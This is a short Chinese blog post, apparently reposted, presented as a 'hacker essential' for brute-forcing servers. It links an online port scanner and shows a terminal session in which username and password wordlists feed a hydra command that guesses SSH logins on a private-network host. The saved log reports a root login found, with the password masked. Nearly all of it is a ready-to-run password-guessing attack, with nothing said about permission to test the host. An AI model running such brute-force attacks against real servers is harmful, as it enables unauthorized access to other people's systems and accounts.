暴力破解 服务器 黑客必备

端口扫描在线工具  http://coolaf.com/tool/port

直接上代码:

hydra工具的使用

root@eric-virtual-machine:/opt# cat users.txt 
nginx
root
hhh
asjdsd

root@eric-virtual-machine:/opt# cat password.txt 
123
123
......
sdhfkjsdhf
asdfgdfg
34u593jfoierj

root@eric-virtual-machine:/opt# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.222.11 ssh 
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-03 19:09:40
[DATA] 1 task, 1 server, 45 login tries (l:5/p:9), ~45 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.222.11 - login "nginx" - pass "nginx" - 1 of 45 [child 0]
^C[ERROR] Received signal 2, going down ...
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@eric-virtual-machine:/opt# cat save.log 
# Hydra v7.5 run at 2019-04-03 18:57:16 on 192.168.222.11 ssh (hydra  -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.222.11 ssh)
[22][ssh] host: 192.168.222.11   login: root   password: ......
[22][ssh] host: 192.168.222.11   login:    password: ......
# Hydra v7.5 run at 2019-04-03 19:09:40 on 192.168.222.11 ssh (hydra  -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.222.11 ssh)

 

参考文档:

【经验分享】Hydra(爆破神器)使用方法 

猜你喜欢

转载自www.cnblogs.com/jycjy/p/10650931.html